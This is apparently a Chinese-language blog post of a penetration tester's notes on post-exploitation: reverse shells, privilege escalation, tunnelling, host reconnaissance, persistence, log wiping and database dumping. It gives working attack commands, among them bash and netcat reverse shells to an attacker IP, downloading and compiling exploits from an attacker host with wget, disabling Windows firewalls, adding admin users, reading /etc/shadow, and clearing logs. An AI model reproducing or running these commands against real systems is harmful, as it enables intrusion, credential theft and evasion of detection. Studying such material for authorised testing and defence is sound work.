1-内网安全之后渗透

反弹shell

nc反弹

概念:nc全称netcat,一种开源的类似nmap的CLI网络工具。Ncat与其同宗。

基本功能:网络连接测试、网络测速、端口扫描、传输文件、通讯聊天等。

利用过程(已获取webshell的情况)

Linux系统环境

#远控侦听端口
nc -lvp port
#尝试在client执行命令
bash -i > /dev/tcp/远控IP/远控port/ 0>&1 2>&1 或者
nc -e /bin/bash远控IP/远控port
#进入交互式环境
python -c 'import pty;pty.spawn("/bin/bash")'

 Windows系统环境

上传nc.exe
执行nc.exe -e cmd.exe 远控IP/远控port

 

python反弹

 

php反弹

 

perl反弹

 

powershell反弹

 

 

提权

注:普通用户——管理员 ;web用户——系统用户

windows提权(已获得webshell)

启动项提权:权限维持

系统漏洞提权

获取webshell。win2k3须上传aspx大马获取可执行cmd的webshell(win2k8无需)
找补丁:执行脚本,根据补丁情况比对对应的漏洞是否存在。
找漏洞:MS09-012(PR/烤肉)、MS15-015等
找exp:上传执行pr.exe/ch.exe
权限维持:新建用户加入管理员组——命令行开启3389——RDP连接。
内网端口转发:lcx

#注意事项
无法执行cmd命令	                   上传cmd.exe
无法上传exp,可能因为目录无写权限	  上传至日志、缓存、家目录、回收站等有写权限的目录。
phpstudy/xampp/wampserver Website	 获取webshell之后即为系统管理员权限。
宝塔Website	                       由于防护高级,禁用函数,可考虑如何绕过。

数据库提权

MSSQL提权:获取sa密码后,用SQL TOOLS工具即可。

MYSQL提权:udf/mof。寻找工具!

 

Server-u提权

360提权

linux提权(已获得webshell)

 利用系统内核漏洞提权

#手工
收集系统信息	uname -a
找exp	     www.baidu.com/www.exploit-db.com
上传-编译-执行	.c文件
提权辅助poc   linux-exploit-suggester.sh
上传	        wget  http://ip:port/linux-exploit-suggester.sh  >les.sh
赋权	        chmod  +x  linux-exploit-suggester.sh
运行	        ./linux-exploit-suggester.sh
找对应EXP	   ?

#Kali
搜索漏洞库	  searchsploit  centos7
拷贝到当前目录	searchsploit  -m  35370
开启http服务	python  -m  SimpleHTTPServer  8080
上传(反弹shell窗口中执行)	wget  http://黑客ip:8080/35370.c
运行提权脚本	gcc  35370.c  -o  exploit  -lpthread      ./exploit     执行id查看是否为root权限

利用第三方软件提权

套路多,实战积累!

 

 

 

 

内网隧道(端口转发)

代理——本质上是解决网络问题!      添加路由、开启代理

frp代理   一级/二级/三级?        socks代理     lcx

Proxiffer、frp reGeorg ngrok zerotier

proxychains设置

参考资料:https://blog.csdn.net/na_tion/article/details/47728121

内网信息收集(本机)

windows

https://blog.csdn.net/weixin_45551083/article/details/107443300

#系统信息
systeminfo
echo %PROCESSOR_ARCHITECTURE%       查看系统体系结构
wmic product get name,version       查看安装软件的版本,路径
wmic service list brief             查询本机服务信息
tasklist                            查询进程信息
wmic process list brief             查询进程信息
wmic startup get command,caption    查询启动程序信息
schtasks /query /fo LIST /v         查询计划任务

#用户信息
net user   查询用户列表
net localgroup administrators       查询管理员组的成员
query user                          查看当前用户及登录状态
net session                         查看本地计算机与所连接客户端之间的对话

#网络信息
共享列表、会话
ipconfig  /all  查询ip地址
netstat  -ano   查询网络连接
net share       查询本机共享列表
wmic share get name,path,status    查询本机共享列表
route print     查询路由信息
arp  -a         查询arp解析表
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber      查询远程管理端口

防火墙-关闭防火墙
Windows Server 2003及之前版本
命令:netsh firewall set opmode disable
Windows Server 2003之后版本
命令:netsh advfirewall set allprofiles state off

防火墙-查看防火墙配置
命令: netsh advfirewall show allprofiles

防火墙-修改防火墙配置
Windows Server 2003及之前版本,允许指定程序全部连接
命令: netsh firewall add allowedprogram c:\nc.exe “allow nc” enable
Windows Server 2003之后版本,允许指定程序全部连接
命令: netsh advfirewall firewall add rule name=“pass nc” dir=in action=allow program=“C:\nc.exe”
允许指定程序退出
命令: netsh advfirewall firewall add rule name=“Allow nc” dir=out action=out program=“C:\nc.exe”
允许3389端口放行
命令:netsh advfirewall firewall add rule name=“Remote Desktop” protocol=TCP dir=in localport=3389 action=allow
防火墙-自定义防火墙储存位置
命令: netsh advfirewall set currentprofile logging filename “C:\windows\temp\fw.log”

#软件、进程、服务信息。
systeminfo                       查询补丁信息
wmic qfe get Caption,Description,HotFixID,InstalledOn         查询补丁信息
杀毒软件?

linux

#系统信息
hostname 
uname -a
cat  /etc/os-release
cat  /proc/version
cat  /proc/cpuinfo
cat  /proc/meminfo
df -h
free -m
cat  /etc/redhat-release
cat  /etc/issue
cat  /etc/lsb-release

#用户信息
cat  /etc/passwd
cat  /etc/shadow
cat  /etc/login.defs
cat  /etc/group
users
whoami
id
who -a
w
last
lastlog
env
cat ~/.bash_history
cat  /etc/shells

#网络配置、连接信息
ipconfig
arp  -a
route
cat  /etc/resolv.conf
netstat  -anlpt
iptables  -L

#软件、服务、进程、任务信息
ps aux
ps -ef

ls -al  /etc/cron*
cat  /etc/crontab

rpm  -qa
ls -l  /etc/yum.repos.d/
dpkg  -l

内网信息收集(网络)

存活探测:

域环境探测:https://www.freebuf.com/articles/web/269889.html

 

工具:fscan            扫描网段内弱口令:ntscan              爆本地账户密码:getpass             其它工具:ipconfig/arp -a/net view/nmap/scanport/

 

 

 其它

权限维持

#windows后门

上兴、梦想时代         vps/花生壳动态域名解析成公网IP

#linux通用后门       openssh-5.9p1

痕迹清除

windows脚本、linux脚本 cat /dev/null > var/log等日志目录

 

源码打包

#asp

webshell里源码打包;同时下载webshell文件+aspweb小旋风。

注:access源码打包即带、mssql需专门脱裤。

#php

webshell里使用phpmyzip工具进行压缩下载。(文件大-分开打包)

黑客脱裤

#允许外联

Navicat客户端连接,转储MySQL库(root权限),转储mssql表。

#不允许外联

sqlmap

bp

webshell里上传脱裤脚本mysql.php,访问,一键备份或导出,下载。  webshell里上传脱裤脚本msssql.asp,访问,一键备份或导出,下载。

posted @ 2023-04-05 11:31  dustfree  阅读(44)  评论(0编辑  收藏  举报